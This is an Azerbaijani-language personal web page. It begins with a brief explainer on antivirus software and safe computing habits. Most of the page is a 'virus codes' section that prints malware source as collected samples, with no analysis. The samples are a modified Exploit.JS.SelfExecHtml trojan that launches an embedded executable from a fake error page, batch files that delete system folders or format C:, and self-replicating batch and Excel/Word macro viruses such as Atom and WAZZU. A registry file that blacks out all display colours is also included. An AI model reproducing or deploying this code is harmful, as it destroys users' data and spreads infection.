Antiviruslar
Antivirus proqramları kompyüter viruslarını tapan, məhv edən və onların yayılmasının qarşısını
alan proqramlar təminatıdır. Sadə antivirus proqramları ilk virusların yayılması ilə
meydana gəlmişdir. İndi isə antivirus proqram təminatlarının yaradılması və inkişaf
etdirilməsi ilə böyük şirkətlər məşğul olur. Belə proqramlar viruslar, troyan proqramları,
hakker hücumları və s. kimi proseslərin qarşısını alır. Antivirusların viruslarla mübarizəsi əsasən
2 istiramətdə gedir:
1. Öz bazası əsasında virusların tapılması.
2. Şübhəli proqramlar və proseslər vasitəsilə virusların tapılması.
Əgər virus və ya viruslanmış fayl tapılarsa, istifadəçinin seçimi ilə həmin fayl ya silinir,
ya müalicə olunur, ya da karantinə qoyularaq ona giriş yasaqlanır.
Viruslar hər gün yaradılan və kompyüter istifadəçilərinin narahatlığına səbəb olan
proqramlardır. Axı onun ziyanverici fəaliyyəti nəticəsində bir gün sizin üçün dəyərli
informasiyalarınız silinə və ya oğurlana bilər. Bunun qarşısını almaqdan ötrü sizə
məşhur, yoxlanılmış firmaların antivirus məhsullarından (proqram təminatından) istifadə
məsləhət olunur. Veb səhifənin sol tərəfində məşhur antivirus proqramlarına linklər verilmişdir.
Lakin unutmayın ki, iki müxtəlif antivirus proqramlarının bir kompyüterdə
istifadəsi yolverilməzdir və bu sistemdə böyük problemlərə səbəb ola bilər.
Viruslardan qorunmanın digər yolu kompyüterinizə daxil etdiyiniz bütün disket, disk, fleşka
və digər daşınan yaddaş qurğuları açmazdan əvvəl onu yeni bazaya malik antivirus proqramı ilə
yoxlamaqdır.
Virusların ən geniş və əlverişli yayılma məkanı internetdir. Buna görə də antivirus
proqramınız monitor (online) rejimdə işləməlidir ki, müxtəlif ziyanverici faylların,
proqramların, hakker hücumlarının qarşısını ala bilsin.
Elektron ünvanınıza gələn, mənbəyi bəlli olmayan məktubları isə qətiyyən açmayın.
Virus kodları
EICAR virus test - Antivirusun ishleme qabiliyyetini yoxlamaq uchun mueyyen formatda (.txt; .com) ashaghi ardicilliqda yaradilmish tehlukeziz test
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
-----------------------------------------------------------------------------------
IE oldurmek uchun 67 baytliq script
script sozunun evveline < simvolunu yaz
script>for (x in document.write) { document.write(x);}...
-----------------------------------------------------------------------------------
Troyan Exploit.JS.SelfExecHtml (modifikasiya)
<html>
-->
MIME-Version:
1.0
Content-Location:file:///run.exe
Content-Transfer-Encoding:
base64
[BINARY TEXT]
<title>Welcome
- Home</title>
<body bgcolor=black
scroll=no> <!-- MIME kodu qarada gizledirik
-->
<SCRIPT>
function
malware()
{
s=document.URL;path=
s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write(
'<object style="cursor:cross-hair" alt="Sorry, Error
On This Page! Please Open With Internet Explorer"
classid="clsid:66666666-6666-6666-6666"
CODEBASE="mhtml:'+path+'\\docs.folder!file:///run.exe"></object><!--
Запускем бинарник
-->
<title>Error</title> <body
scroll=no bgcolor=black>
<center><h1><FONT color=red>Sorry,
Error On This Page! <br> Please Open With Internet
Explorer</h1></center>><!-- Teksti yaziriq
-->')
}setTimeout("malware()",150)
</script>
</body>
</html>
-----------------------------------------------------------------------------------
Virus Troyan.BAT.DelAll.aq
@echo off
del /y c:\windows\*.*
@echo off
del /y c:\Progra~1\*.*
@echo off
del /y c:\*.*
@echo off
cls
@echo .::VIRUSU UDDUN.NUS OLSUN::.
@echo off
-----------------------------------------------------------------------------------
Type BAT Modifikasiya
@echo off>nul.dds
if %1.==i. goto ddsI
if not exist %0 goto ddsEnd
find "dds"<%0>c:\dds.bat
for %%a in (*.bat) do call c:\dds.bat i %%a
goto ddsOff
:ddsI
if %2.==. goto ddsEnd
echo %2 | find /I "autoexec">nul.dds
if not errorlevel 1 goto ddsEnd
find "dds"<%2>nul
if not errorlevel 1 goto ddsEnd
echo.>enter.dds
type enter.dds>>%2
del enter.dds>nul.dds
type c:\dds.bat>>%2
goto ddsEnd
:ddsOff
if exist c:\dds.bat del c:\dds.bat>nul
:ddsEnd
----------------------------------------------------------------------------------
Virus BAT.Winstart
@ECHO OFF
:s%r#
COPY %0.BAT C:\Q.COM>NUL
C:\Q
[...]
---------------------------------------------------------------------------------
Virus Troyan BAT.FormatCQ.t
shit$ = "echo y|format c: /q"
Shell Environment$ ("COMSPEC") + "/c" + shit$, 0
-----------------------------------------------------------------------------------------
Virus Troyan BAT.DeltreeY.a
deltree /y c:\windows
deltree /y c:\progra~1
--------------------------------------------------------------------------
Virus TYPE_Bat
@echo off>nul.dds
if %1.==i. goto ddsI
if not exist %0 goto ddsEnd
find "dds"<%0>c:\dds.bat
for %%a in (*.bat) do call c:\dds.bat i %%a
goto ddsOff
0:ddsI
if %2.==. goto ddsEnd
echo %2 | find /I "autoexec">nul.dds
if not errorlevel 1 goto ddsEnd
find "dds"<%2>nul
if not errorlevel 1 goto ddsEnd
echo.>enter.dds
type enter.dds>>%2
del enter.dds>nul.dds
type c:\dds.bat>>%2
goto ddsEnd
:ddsOff
if exist c:\dds.bat del c:\dds.bat>nul
:ddsEnd
--------------------------------------------------------------------------------------
Sub Auto_Open()
If cek_global() Then 'check on global! (Optional to use)
GoTo FuckSheet: 'found?
Else
infectglobal 'Goto to Infecting Routine
End If
FuckSheet:
Application.OnSheetActivate = "XXX.XLM!Fuck" 'XXX.XLM is Template
'for Ur Virus
'Fuck is the MacroName
'for infecting
bye:
End Sub
Function cek_global() As Boolean 'Yes/No (Flase/True)
cek_global = False 'Set False First
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "XXX.XLM" Then
For y = 1 To Application.Workbooks("XXX.XLM").Modules.Count
If Application.Workbooks("XXX.XLM").Modules(y).Name = "YYYYY" Then
cek_global = True
'YYYYY is the module Name for Ur Code
End If
Next y
End If
Next x
End Function
Function infectglobal()
Activebook = ActiveWorkbook.Name 'Get Active Workbook/WorkSheet
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\XXX.XLM"
'Make New Template (XXX.XLM) on Excel StarUp Directori (XLSTART)
Workbooks.Open (Application.StartupPath + "\XXX.XLM")
Windows("XXX.XLM").Visible = False 'Hide Dont let User See our move
Application.Workbooks("XXX.XLM").Save 'Save it!
End Function
Sub Fuck()
oactivebook = ActiveWorkbook.Name
If inFuckIt() Then 'Check WorkSheet are they Infected??
GoTo bye2 'If Yes goto Bye2
Else 'If no ..... let`s doit!!
End If
Application.ScreenUpdating = False 'Hide from User
Application.Windows("XXX.XLM").Visible = True
Workbooks("XXX.XLM").Activate 'Activate XXX.XLM/Global/Template
Sheets("YYYYY").Visible = True 'Activate/Open the Module Name
Workbooks("XXX.XLM").Sheets("YYYYY").Copy Before:=Workbooks(oactivebook).Sheets(1)
'Copy Module from template to WorkSheet!
Workbooks(oactivebook).Sheets("YYYY").Visible = False
'Hide Sheet !! on file
Workbooks("XXX.XLM").Sheets("YYYYY").Visible = False
'Hide Sheet on Global/Template
Windows("XXX.XLM").Visible = False
'Hide GLobal/Template
bye2:
Close
End Sub
Function inFuckIt() As Boolean 'Yes/No (False/True)
activebook = ActiveWorkbook.Name 'Use Active WorkSheet
inFuckIt = False 'set false first
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "YYYYY" Then
inFuckIt = True
End If
Next y
End Function
-------------------------------------------------------------------------------------
Macros: Atom (Virus in WinWord)
Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
Kill "*.*"
End If
KillError:
End Sub
Macros: AutoOpen
Sub MAIN
Dim FN$
FN$ = FileName$()
On Error Goto ErrorInfectGlobalTemplate
If (CheckInfected = 0) Then
MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
MacroCopy FN$ + ":FileOpen", "FileOpen", 1
MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
MacroCopy FN$ + ":Atom", "Atom", 1
SaveTemplate
End If
Call Atom
ErrorInfectGlobalTemplate:
End Sub
Function CheckInfected
CheckInfected = 0
If (CountMacros(0) >= 4) Then
For I = 1 To CountMacros(0)
If (MacroName$(I, 0) = "Atom") Then
CheckInfected = 1
End If
Next I
End If
End Function
Macros: FileOpen
Sub MAIN
On Error Goto InfError
Dim dlg As FileOpen
GetCurValues dlg
Dialog dlg
FileOpen dlg
MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1
MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1
MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1
MacroCopy "Atom", Dlg.Name + ":Atom", 1
FileSaveAs .Format = 1
InfError:
End Sub
Macros: FileSaveAs
Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (Dlg.Format = 1) Then
MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1
MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1
MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1
MacroCopy "Atom", WindowName$() + ":Atom", 1
Dlg.Format = 1
End If
If (Second(Now()) = 13) Then ] easy... to block a document
Dlg.Password = "ATOM#1" ] a idea why not put a randomize passwd ?
End If
FileSaveAs dlg
End Sub
----------------------------------------------------------------------------------
Here is the macro (Basic) but deadly...
Sub MAIN
sCmd$ = "echo y|format c: /u"
Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0
End Sub
----------------------------------------------------------------------------------
WORDMACRO WAZZU
Sub MAIN
On Error Goto errCaught
FileSummaryInfo .Update
Dim dlg As FileSummaryInfo
GetCurValues dlg
fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
globMacro$ = "Global:autoOpen"
MacroFile$ = UCase$(Right$(MacroFileName$(MacroName$(0)), 10))
If MacroFile$ = "NORMAL.DOT" Then
MacroCopy globMacro$, fileMacro$
FileSaveAs .Format = 1
Else
MacroCopy fileMacro$, globMacro$
End If
Payload
Goto bye
errCaught:
bye:
On Error Goto 0
End Sub
Sub Payload
For i = 1 To 3
If Rnd() < 0.2 Then
RndWord
SelectCurWord
selWord$ = Selection$()
DeleteWord
RndWord
Insert selWord$ + " "
End If
Next
If Rnd() < 0.25 Then
RndWord
Insert "wazzu " <-------------------here's the payload
StartOfDocument
End If
End Sub
Sub RndWord
FileSummaryInfo .Update
Dim dlg As DocumentStatistics
vGetCurValues dlg
wordNum = Int(Rnd() * Val(dlg.Words))
StartOfDocument
WordRight wordNum
End Sub
-----------------------------------------------------------------------------------
reg virus
REGEDIT4
[HKEY_CURRENT_USER\Control Panel\Colors]
"ActiveBorder"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"ActiveTitle"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"AppWorkSpace"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"Background"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"ButtonAlternateFace"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"ButtonDkShadow"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"ButtonFace"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"ButtonHilight"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"ButtonShadow"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"ButtonText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"GradientActiveTitle"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"GradientInactiveTitle"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"GrayText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"Hilight"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"HilightText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"HotTrackingColor"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"InactiveBorder"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"InactiveTitle"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"InactiveTitleText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"InfoText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"InfoWindow"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"Menu"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"MenuBar"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"MenuHilight"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"MenuText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"Scrollbar"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"TitleText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"Window"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"WindowFrame"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Colors]
"WindowText"="000 000 000"
[HKEY_CURRENT_USER\Control Panel\Mouse]
"DoubleClickHeight"="0"
[HKEY_CURRENT_USER\Control Panel\Mouse]
"DoubleClickWidth"="0"
[HKEY_CURRENT_USER\Control Panel\Desktop]
"Wallpaper"=""
-----------------------------------------------------------------------------------
| 
E-mail
Saytın xəritəsi
Haqqımda
